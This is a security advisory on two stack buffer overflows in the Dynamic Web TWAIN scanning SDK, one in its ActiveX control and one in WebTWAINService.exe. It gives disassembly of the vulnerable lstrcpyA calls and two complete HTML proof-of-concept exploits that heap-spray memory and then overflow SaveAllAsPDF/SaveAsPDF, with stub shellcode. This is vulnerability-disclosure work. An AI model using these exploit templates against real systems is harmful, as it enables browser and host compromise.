Introduction
Dynamic Web TWAIN is a TWAIN-based scanning SDK software specifically designed for web applications. With just a few lines of code, you can develop robust applications to scan documents from TWAIN-compatible scanners, edit the scanned images and save them to a file system.
Vulnerability Details
Two security vulnerabilities have been found in Dynamic Web TAWIN:
- DynamicWebTwainCtrl.DynamicWebTwain.1 ActiveXObject SaveAllAsPDF/SaveAsPDF Methods lstrcpyA() Call Stack Buffer Overflow Vulnerability
- WebTWAINService.exe Service SaveAllAsPDF/SaveAsPDF Methods lstrcpyA() Call Stack Buffer Overflow Vulnerability
DynamicWebTwainCtrl.DynamicWebTwain.1 ActiveXObject SaveAllAsPDF/SaveAsPDF Methods lstrcpyA() Call Stack Buffer Overflow Vulnerability
The Dynamic Web TWAIN installs an ActiveX control with the following settings:
CLSID: {FFC6F181-A5CF-4ec4-A441-093D7134FBF2} Progid: DynamicWebTwainCtrl.DynamicWebTwain.1 Binary Path: C:\Windows\SysWOW64\Dynamsoft\DynamicWebTwain\DynamicWebTwainCtrlTrial.dll Implements IObjectSafety: False Safe For Initialization (Registry): True Safe For Initialization (Registry): True
According to the registry, this control is safe for scripting and safe for initialization, then Internet Explorer will allow to script its properties and methods according to the target user browser security settings.
The ActiveX offers the SaveAllAsPDF and SaveAsPdf methods, see typelib:
... /* DISPID=355 */ /* VT_BOOL [11] */ function SaveAllAsPDF( /* VT_BSTR [8] [in] */ $FileName <-------------- ) { /* method SaveAllAsPDF */ } /* DISPID=354 */ /* VT_BOOL [11] */ function SaveAsPDF( /* VT_BSTR [8] [in] */ $FileName, <-------------- /* VT_I2 [2] [in] */ $sImageIndex ) { /* method SaveAsPDF */ } ...
the FileName parameter suffers of stack buffer overflow vulnerability because of a dangerous call to lstrcpyA() inside the DynamicWebTwainCtrlTrial.dll
Vulnerable Code
Vulnerable code inside DynamicWebTwainCtrlTrial.dll:
;---------------------------------------------------------------------------------------------------- 1003324F SUB_L1003324F: ... 10033290 F3AB rep stosd 10033292 66AB stosw 10033294 AA stosb 10033295 8D85DCFEFFFF lea eax,[ebp-00000124h] 1003329B 50 push eax 1003329C FF159C720710 call [KERNEL32.dll!lstrcpyA] <--------- 100332A2 8D85DCFEFFFF lea eax,[ebp-00000124h] 100332A8 6A04 push 00000004h 100332AA 50 push eax ... ;----------------------------------------------------------------------------
Exploit
<html> <object classid="clsid:FFC6F181-A5CF-4ec4-A441-093D7134FBF2" id="obj"> </object> <body> <div id="blah"></div> <script> var div_container = document.getElementById("blah"); div_container.style.cssText = "display:none"; var data; offset = 0x100; junk = unescape("%u0c0c%u0c0c"); while (junk.length < 0x1000) junk += junk; rop = unescape("%u4141%u4141"); shellcode = unescape("%u4141%u4141"); data = junk.substring(0,offset) + rop + shellcode data += junk.substring(0,0x800-offset-rop.length-shellcode.length); while (data.length < 0x80000) data += data; for (var i = 0; i < 0x800; i++) { var x = document.createElement("button"); x.title = data.substring(0,0x40000-0x58); div_container.appendChild(x); } var xx=""; for(i=0;i<500;i++){ xx=xx+"A"; } obj.SaveAllAsPDF(xx); //obj.SaveAsPDF(xx,1); </script> </body> </html>
WebTWAINService.exe Service SaveAllAsPDF/SaveAsPDF Methods lstrcpyA() Call Stack Buffer Overflow Vulnerability
Similar to the above ActiveX, the WebTWAINService.exe which renders incoming requests from users (via a web browser) is vulnerable to the same attack just through a different vector.
Vulnerable Code
Vulnerable code inside the WebTWAINService.exe:
;---------------------------------------------------------------------------------------------------- 00462CE0 CASE_PROCTABLE_00462CE0: 00462CE0 282B4600 dd CASE_00462CE0_PROC0000 00462CE4 282B4600 dd CASE_00462CE0_PROC0000 00462CE8 4E2B4600 dd CASE_00462CE0_PROC0002 00462CEC 282B4600 dd CASE_00462CE0_PROC0000 00462CF0 3B2B4600 dd CASE_00462CE0_PROC0004 00462CF4 CCCCCCCCCCCCCCCCCCCC+ Align 16 00462D00 SUB_L00462D00: 00462D00 6AFF push FFFFFFFFh ... 00462D8A 56 push esi 00462D8B 8D542440 lea edx,[esp+40h] 00462D8F 52 push edx 00462D90 FF1564034E00 call [KERNEL32.dll!lstrcpyA] <--------- vulnerable call ... ;----------------------------------------------------------------------------------------------------
Exploit
<!DOCTYPE html> <html> <head> <title> Dynamic Web TWAIN POC 02 </title> <script> function spray(){ var x=[]; for(i=0;i<300000;i++){x.push(new String("AAAA"))} } function crash(){ var x=""; for(i=0;i<1000000;i++){x+="AAAA"} var y=""; for(i=0;i<100000;i++){y+="AAAA"} var a=window.navigator.appVersion; var b=a.match(/AppleWebKit/); var c=a[0]==="AppleWebKit"; if (c===false){try{ dwtcontrolContainer_Obj.SaveAllAsPDF(x) // Internet Explorer } catch(e){}}; DWObject.SaveAsPDF(x); // Google Chrome, Firefox, Opera } </script> <script type="text/javascript" language="javascript" src="Resources/dynamsoft.webtwain.initiate.js?t=150417"></script> <script type="text/javascript" language="javascript" src="Resources/dynamsoft.webtwain.config.js"></script> <script type="text/javascript" language="javascript" src="Scripts/online_demo_operation.js"></script> <script type="text/javascript" language="javascript" src="Scripts/online_demo_initpage.js"></script> <script type="text/javascript" language="javascript" src="Scripts/jquery.js"></script> </head> <body> <div id="blah"></div> <div id="DWTcontainer" class="body_Broad_width"> <div id="dwtcontrolContainer"></div> <div id="DWTNonInstallContainerID"></div> <div id="DWTemessageContainer"></div> </div> <script> var div_container = document.getElementById("blah"); div_container.style.cssText = "display:none"; var data; offset = 0x100; junk = unescape("%u0c0c%u0c0c"); while (junk.length < 0x1000) junk += junk; rop = unescape("%u4141%u4141"); shellcode = unescape("%u4141%u4141"); data = junk.substring(0,offset) + rop + shellcode data += junk.substring(0,0x800-offset-rop.length-shellcode.length); while (data.length < 0x80000) data += data; for (var i = 0; i < 0x800; i++) { var x = document.createElement("button"); x.title = data.substring(0,0x40000-0x58); div_container.appendChild(x); } setTimeout(function(){crash()},6000); </script> </body> </html>
Vendor Response
Dynamic Web TWAIN version 11.3 has been released to address the above listed issues: http://www.dynamsoft.com/Downloads/WebTWAIN_Download.aspx.